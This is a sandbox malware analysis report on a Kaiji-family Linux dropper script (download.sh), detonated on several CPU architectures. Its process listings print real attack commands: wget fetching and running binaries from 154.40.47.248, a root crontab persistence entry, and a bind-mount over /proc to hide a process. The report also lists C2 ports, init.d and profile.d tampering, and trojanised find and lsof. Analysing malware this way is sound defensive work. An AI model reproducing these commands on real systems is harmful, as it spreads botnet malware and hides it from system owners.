Malware Analysis Report

2025-05-05 22:14

Sample ID 250416-xe2xesylt3
Target download.sh
SHA256 1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca
Tags kaiji defense_evasion discovery execution persistence privilege_escalation
Score 10/10


Analysis Overview

Score 10/10

SHA256 1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca

Threat Level: Known bad

The file download.sh was found to be: Known bad.

Malicious Activity Summary

Tags kaiji defense_evasion discovery execution persistence privilege_escalation

Kaiji family

Kaiji

Executes dropped EXE

Modifies Watchdog functionality

File and Directory Permissions Modification

Modifies init.d

Enumerates running processes

Write file to user bin folder

Creates/modifies Cron job

Creates/modifies environment variables

Modifies Bash startup script

Changes its process name

System Network Configuration Discovery

Command and Scripting Interpreter: Unix Shell

Enumerates kernel/hardware configuration

Reads runtime system information

Writes file to tmp directory

Analysis: static1

Detonation Overview

Reported 2025-04-16 18:46

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted 2025-04-16 18:46
Reported 2025-04-16 18:49
Platform debian9-mipsel-20240418-en
Max time kernel 149s
Max time network 147s

Command Line

[/tmp/download.sh]

Signatures

Kaiji

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Kaiji family

kaiji

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/linux_mips /tmp/download.sh N/A
N/A /tmp/linux_mipsel /tmp/download.sh N/A
N/A /tmp/linux_mipsel /tmp/linux_mipsel N/A
N/A /etc/32676 /bin/sh N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /bin/sh N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 /tmp/linux_mipsel N/A

Command and Scripting Interpreter: Unix Shell

execution
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target Count
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A 31
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_mipsel N/A 2

Reads runtime system information

discovery
Description Indicator Process Target Count
File opened for reading /proc/1/environ /bin/systemctl N/A 15
File opened for reading /proc/cmdline /bin/systemctl N/A 15
File opened for reading /proc/self/stat /bin/systemctl N/A 19
File opened for reading /proc/filesystems /bin/systemctl N/A 15

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/linux_mips N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/linux_mipsel N/A
N/A N/A /tmp/linux_mipsel N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/linux_mips /usr/bin/wget N/A
File opened for modification /tmp/linux_mipsel /usr/bin/wget N/A

Processes

/tmp/download.sh  [/tmp/download.sh]
/bin/uname  [uname -s]
/bin/uname  [uname -m]
/bin/rm  [rm -f linux_mips]
/usr/bin/wget  [wget -t 1 http://154.40.47.248:8000/linux_mips]
/bin/chmod  [chmod +x linux_mips]
/tmp/linux_mips  [./linux_mips]
/bin/rm  [rm -f linux_mips]
/bin/rm  [rm -f linux_mipsel]
/usr/bin/wget  [wget -t 1 http://154.40.47.248:8000/linux_mipsel]
/bin/chmod  [chmod +x linux_mipsel]
/tmp/linux_mipsel  [./linux_mipsel]
/tmp/linux_mipsel  [./linux_mipsel ]
/bin/rm  [/bin/rm /tmp/download.sh]
/bin/sh  [/bin/sh -c /etc/32676&]
/etc/32676  [/etc/32676]
/usr/sbin/service  [service crond start]
/usr/bin/basename  [basename /usr/sbin/service]
/bin/sleep  [sleep 60]
/usr/bin/basename  [basename /usr/sbin/service]
/bin/systemctl  [systemctl --quiet is-active multi-user.target]
/bin/systemctl  [systemctl list-unit-files --full --type=socket]
/bin/sed  [sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]
/bin/systemctl  [systemctl -p Triggers show dbus.socket]
/bin/systemctl  [systemctl -p Triggers show ssh.socket]
/bin/systemctl  [systemctl -p Triggers show syslog.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-fsckd.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-initctl.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald-audit.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald-dev-log.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-networkd.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-rfkill.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-udevd-control.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-udevd-kernel.socket]
/usr/local/sbin/systemctl  [systemctl start crond.service]
/usr/local/bin/systemctl  [systemctl start crond.service]
/usr/sbin/systemctl  [systemctl start crond.service]
/usr/bin/systemctl  [systemctl start crond.service]
/sbin/systemctl  [systemctl start crond.service]
/bin/systemctl  [systemctl start crond.service]
/bin/sh  [/bin/sh -c echo "*/1 * * * * root /.mod " >> /etc/crontab]
/usr/bin/renice  [renice -20 803]
/bin/mount  [mount -o bind /tmp/ /proc/803]
/usr/sbin/service  [service cron start]
/usr/bin/basename  [basename /usr/sbin/service]
/usr/bin/basename  [basename /usr/sbin/service]
/bin/systemctl  [systemctl --quiet is-active multi-user.target]
/bin/systemctl  [systemctl list-unit-files --full --type=socket]
/bin/sed  [sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]
/bin/systemctl  [systemctl -p Triggers show dbus.socket]
/bin/systemctl  [systemctl -p Triggers show ssh.socket]
/bin/systemctl  [systemctl -p Triggers show syslog.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-fsckd.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-initctl.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald-audit.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald-dev-log.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-networkd.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-rfkill.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-udevd-control.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-udevd-kernel.socket]
/usr/local/sbin/systemctl  [systemctl start cron.service]
/usr/local/bin/systemctl  [systemctl start cron.service]
/usr/sbin/systemctl  [systemctl start cron.service]
/usr/bin/systemctl  [systemctl start cron.service]
/sbin/systemctl  [systemctl start cron.service]
/bin/systemctl  [systemctl start cron.service]
/bin/systemctl  [systemctl start crond.service]
/bin/sleep  [sleep 60]
/bin/sleep  [sleep 60]

Network

Country Destination Domain Proto
US 154.40.47.248:8000 154.40.47.248 tcp
US 154.40.47.248:8000 154.40.47.248 tcp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
US 154.40.47.248:888 N/A tcp

Files

/tmp/linux_mips
/tmp/linux_mipsel
/etc/.walk (two versions, differing hashes)
/etc/32676
/.mod
/usr/bin/include/find
/etc/profile.d/gateway.sh

Analysis: behavioral1

Detonation Overview

Submitted 2025-04-16 18:46
Reported 2025-04-16 18:49
Platform ubuntu1804-amd64-20250410-en
Max time kernel 149s
Max time network 147s

Command Line

[/tmp/download.sh]

Signatures

Kaiji

Description Indicator Process Target
N/A N/A N/A N/A

Kaiji family

kaiji

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/linux_amd64 /tmp/download.sh N/A
N/A /tmp/linux_amd64 /tmp/linux_amd64 N/A
N/A /etc/32676 /bin/sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/linux_amd64 N/A
File opened for modification /dev/misc/watchdog /tmp/linux_amd64 N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /bin/sh N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /etc/profile.d/bash_cfg /tmp/linux_amd64 N/A
File opened for modification /etc/profile.d/bash_cfg.sh /tmp/linux_amd64 N/A
File opened for modification /etc/profile.d/gateway.sh /tmp/linux_amd64 N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/alsa-utils /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/apparmor /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/bluetooth /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/cups /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/kmod /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/apport /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/cups-browsed /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/plymouth-log /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/selinux-autorelabel /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/uuidd /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/avahi-daemon /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/keyboard-setup.sh /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/rsync /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/saned /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/ssh /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/unattended-upgrades /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/speech-dispatcher /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/networking /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/procps /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/ufw /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/auditd /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/irqbalance /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/plymouth /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/x11-common /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/gdm3 /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/anacron /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/console-setup.sh /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/cron /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/spice-vdagent /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/acpid /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/hwclock.sh /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/udev /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/rsyslog /tmp/linux_amd64 N/A
File opened for modification /etc/init.d/dbus /tmp/linux_amd64 N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/bin/find /tmp/linux_amd64 N/A
File opened for modification /usr/bin/lsof /tmp/linux_amd64 N/A
File opened for modification /usr/bin/include/find /tmp/linux_amd64 N/A
File opened for modification /usr/bin/include/lsof /tmp/linux_amd64 N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /etc/profile.d/bash_cfg /tmp/linux_amd64 N/A
File opened for modification /etc/profile.d/bash_cfg.sh /tmp/linux_amd64 N/A
File opened for modification /etc/profile.d/gateway.sh /tmp/linux_amd64 N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 /tmp/linux_amd64 N/A

Command and Scripting Interpreter: Unix Shell

execution
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target Count
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_amd64 N/A 2

Reads runtime system information

discovery
Description Indicator Process Target Count
File opened for reading /proc/1204/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/1/environ /bin/systemctl N/A 8
File opened for reading /proc/1/sched /bin/systemctl N/A 12
File opened for reading /proc/sys/kernel/osrelease /bin/systemctl N/A 7
File opened for reading /proc/723/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/cmdline /bin/systemctl N/A 9
File opened for reading /proc/self/stat /bin/systemctl N/A 8
File opened for reading /proc/filesystems /bin/systemctl N/A 7
File opened for reading /proc/910/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/filesystems /bin/sed N/A 1
File opened for reading /proc/460/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/690/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/316/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/570/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/1081/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/1146/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/1544/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/912/stat /tmp/linux_amd64 N/A 1
File opened for reading /proc/1346/stat /tmp/linux_amd64 N/A 1

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/linux_amd64 /usr/bin/wget N/A

Processes

/tmp/download.sh  [/tmp/download.sh]
/bin/uname  [uname -s]
/bin/uname  [uname -m]
/usr/bin/wget  [wget -t 1 http://154.40.47.248:8000/linux_amd64]
/bin/chmod  [chmod +x linux_amd64]
/tmp/linux_amd64  [./linux_amd64]
/tmp/linux_amd64  [./linux_amd64 ]
/bin/rm  [/bin/rm /tmp/download.sh]
/bin/sh  [/bin/sh -c /etc/32676&]
/etc/32676  [/etc/32676]
/usr/sbin/service  [service crond start]
/usr/bin/basename  [basename /usr/sbin/service]
/bin/sleep  [sleep 60]
/usr/bin/basename  [basename /usr/sbin/service]
/bin/systemctl  [systemctl --quiet is-active multi-user.target]
/bin/sed  [sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]
/bin/systemctl  [systemctl list-unit-files --full --type=socket]
/bin/systemctl  [systemctl -p Triggers show acpid.socket]
/bin/systemctl  [systemctl -p Triggers show apport-forward.socket]
/bin/systemctl  [systemctl -p Triggers show avahi-daemon.socket]
/bin/systemctl  [systemctl -p Triggers show cups.socket]
/bin/systemctl  [systemctl -p Triggers show dbus.socket]
/bin/systemctl  [systemctl -p Triggers show saned.socket]
/bin/systemctl  [systemctl -p Triggers show snapd.socket]
/bin/systemctl  [systemctl -p Triggers show ssh.socket]
/bin/systemctl  [systemctl -p Triggers show syslog.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-fsckd.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-initctl.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald-audit.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald-dev-log.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-networkd.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-rfkill.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-udevd-control.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-udevd-kernel.socket]
/bin/systemctl  [systemctl -p Triggers show uuidd.socket]
/usr/local/sbin/systemctl  [systemctl start crond.service]
/usr/local/bin/systemctl  [systemctl start crond.service]
/usr/sbin/systemctl  [systemctl start crond.service]
/usr/bin/systemctl  [systemctl start crond.service]
/sbin/systemctl  [systemctl start crond.service]
/bin/systemctl  [systemctl start crond.service]
/bin/sh  [/bin/sh -c echo "*/1 * * * * root /.mod " >> /etc/crontab]
/usr/bin/renice  [renice -20 1536]
/bin/mount  [mount -o bind /tmp/ /proc/1536]
/usr/sbin/service  [service cron start]
/usr/bin/basename  [basename /usr/sbin/service]
/usr/bin/basename  [basename /usr/sbin/service]
/bin/systemctl  [systemctl --quiet is-active multi-user.target]
/bin/sed  [sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]
/bin/systemctl  [systemctl list-unit-files --full --type=socket]
/bin/systemctl  [systemctl -p Triggers show acpid.socket]
/bin/systemctl  [systemctl -p Triggers show apport-forward.socket]
/bin/systemctl  [systemctl -p Triggers show avahi-daemon.socket]
/bin/systemctl  [systemctl -p Triggers show cups.socket]
/bin/systemctl  [systemctl -p Triggers show dbus.socket]
/bin/systemctl  [systemctl -p Triggers show saned.socket]
/bin/systemctl  [systemctl -p Triggers show snapd.socket]
/bin/systemctl  [systemctl -p Triggers show ssh.socket]
/bin/systemctl  [systemctl -p Triggers show syslog.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-fsckd.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-initctl.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald-audit.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald-dev-log.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-journald.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-networkd.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-rfkill.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-udevd-control.socket]
/bin/systemctl  [systemctl -p Triggers show systemd-udevd-kernel.socket]
/bin/systemctl  [systemctl -p Triggers show uuidd.socket]
/usr/local/sbin/systemctl  [systemctl start cron.service]
/usr/local/bin/systemctl  [systemctl start cron.service]
/usr/sbin/systemctl  [systemctl start cron.service]
/usr/bin/systemctl  [systemctl start cron.service]
/sbin/systemctl  [systemctl start cron.service]
/bin/systemctl  [systemctl start cron.service]
/bin/systemctl  [systemctl start crond.service]
/bin/sleep  [sleep 60]
/bin/sleep  [sleep 60]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 N/A tcp
GB 185.125.188.62:443 N/A tcp
US 34.234.112.35:443 N/A tcp
AU 1.1.1.1:53 ingress.openshift.gnome.org udp
US 34.234.112.35:443 ingress.openshift.gnome.org tcp
US 154.40.47.248:8000 154.40.47.248 tcp
N/A 224.0.0.251:5353 N/A udp
GB 84.17.50.8:443 N/A tcp
AU 1.1.1.1:53 1527653184.rsc.cdn77.org udp
AU 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 84.17.50.8:443 1527653184.rsc.cdn77.org tcp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
US 154.40.47.248:888 N/A tcp

Files

/tmp/linux_amd64
/etc/.walk (two versions, differing hashes)
/etc/32676
/.mod
/usr/bin/include/find
/usr/bin/include/lsof
/etc/profile.d/gateway.sh

Analysis: behavioral2

Detonation Overview

Submitted

2025-04-16 18:46

Reported

2025-04-16 18:49

Platform

debian9-armhf-20240418-en

Max time kernel

149s

Max time network

148s

Command Line

[/tmp/download.sh]

Signatures

Kaiji

Description Indicator Process Target
N/A N/A N/A N/A

Kaiji family

kaiji

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/linux_arm7 /tmp/download.sh N/A
N/A /tmp/linux_arm7 /tmp/linux_arm7 N/A
N/A /etc/32676 /bin/sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/linux_arm7 N/A
File opened for modification /dev/misc/watchdog /tmp/linux_arm7 N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /bin/sh N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /etc/profile.d/bash_cfg /tmp/linux_arm7 N/A
File opened for modification /etc/profile.d/bash_cfg.sh /tmp/linux_arm7 N/A
File opened for modification /etc/profile.d/gateway.sh /tmp/linux_arm7 N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/kmod /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/sudo /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/alsa-utils /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/cron /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/hwclock.sh /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/networking /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/ssh /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/udev /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/auditd /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/console-setup.sh /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/keyboard-setup.sh /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/procps /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/rsyslog /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/selinux-autorelabel /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/x11-common /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/dbus /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/exim4 /tmp/linux_arm7 N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/bin/include/find /tmp/linux_arm7 N/A
File opened for modification /usr/bin/find /tmp/linux_arm7 N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /etc/profile.d/bash_cfg.sh /tmp/linux_arm7 N/A
File opened for modification /etc/profile.d/gateway.sh /tmp/linux_arm7 N/A
File opened for modification /etc/profile.d/bash_cfg /tmp/linux_arm7 N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 /tmp/linux_arm7 N/A

Command and Scripting Interpreter: Unix Shell

execution
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_arm7 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/301/stat /tmp/linux_arm7 N/A
File opened for reading /proc/816/stat /tmp/linux_arm7 N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/635/stat /tmp/linux_arm7 N/A
File opened for reading /proc/637/stat /tmp/linux_arm7 N/A
File opened for reading /proc/588/stat /tmp/linux_arm7 N/A
File opened for reading /proc/814/stat /tmp/linux_arm7 N/A
File opened for reading /proc/807/stat /tmp/linux_arm7 N/A
File opened for reading /proc/727/stat /tmp/linux_arm7 N/A
File opened for reading /proc/847/stat /tmp/linux_arm7 N/A
File opened for reading /proc/630/stat /tmp/linux_arm7 N/A
File opened for reading /proc/720/stat /tmp/linux_arm7 N/A
File opened for reading /proc/849/stat /tmp/linux_arm7 N/A
File opened for reading /proc/filesystems /bin/mount N/A
File opened for reading /proc/314/stat /tmp/linux_arm7 N/A
File opened for reading /proc/854/stat /tmp/linux_arm7 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/linux_arm7 /usr/bin/wget N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/bin/uname

[uname -s]

/bin/uname

[uname -m]

/bin/rm

[rm -f linux_arm7]

/usr/bin/wget

[wget -t 1 http://154.40.47.248:8000/linux_arm7]

/bin/chmod

[chmod +x linux_arm7]

/tmp/linux_arm7

[./linux_arm7]

/tmp/linux_arm7

[./linux_arm7 ]

/bin/rm

[/bin/rm /tmp/download.sh]

/bin/sh

[/bin/sh -c /etc/32676&]

/usr/sbin/service

[service crond start]

/etc/32676

[/etc/32676]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sleep

[sleep 60]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl start crond.service]

/usr/local/bin/systemctl

[systemctl start crond.service]

/usr/sbin/systemctl

[systemctl start crond.service]

/usr/bin/systemctl

[systemctl start crond.service]

/sbin/systemctl

[systemctl start crond.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sh

[/bin/sh -c echo "*/1 * * * * root /.mod " >> /etc/crontab]

/usr/bin/renice

[renice -20 720]

/bin/mount

[mount -o bind /tmp/ /proc/720]

/usr/sbin/service

[service cron start]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl start cron.service]

/usr/local/bin/systemctl

[systemctl start cron.service]

/usr/sbin/systemctl

[systemctl start cron.service]

/usr/bin/systemctl

[systemctl start cron.service]

/sbin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sleep

[sleep 60]

/bin/sleep

[sleep 60]

Network

Country Destination Domain Proto
US 154.40.47.248:8000 154.40.47.248 tcp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
US 154.40.47.248:888 tcp

Files

/tmp/linux_arm7

/etc/.walk

/etc/.walk

/etc/32676

/.mod

/usr/bin/include/find

/etc/profile.d/gateway.sh

Analysis: behavioral3

Detonation Overview

Submitted

2025-04-16 18:46

Reported

2025-04-16 18:49

Platform

debian9-mipsbe-20240729-en

Max time kernel

150s

Max time network

148s

Command Line

[/tmp/download.sh]

Signatures

Kaiji

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Kaiji family

kaiji

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/linux_mips /tmp/download.sh N/A
N/A /tmp/linux_mips /tmp/linux_mips N/A
N/A /etc/32676 /bin/sh N/A
N/A /tmp/linux_mipsel /tmp/download.sh N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /bin/sh N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 /tmp/linux_mips N/A

Command and Scripting Interpreter: Unix Shell

execution
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_mips N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/mount N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/sed N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/linux_mips N/A
N/A N/A /tmp/linux_mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/linux_mipsel N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/linux_mips /usr/bin/wget N/A
File opened for modification /tmp/linux_mipsel /usr/bin/wget N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/bin/uname

[uname -s]

/bin/uname

[uname -m]

/bin/rm

[rm -f linux_mips]

/usr/bin/wget

[wget -t 1 http://154.40.47.248:8000/linux_mips]

/bin/chmod

[chmod +x linux_mips]

/tmp/linux_mips

[./linux_mips]

/tmp/linux_mips

[./linux_mips ]

/bin/rm

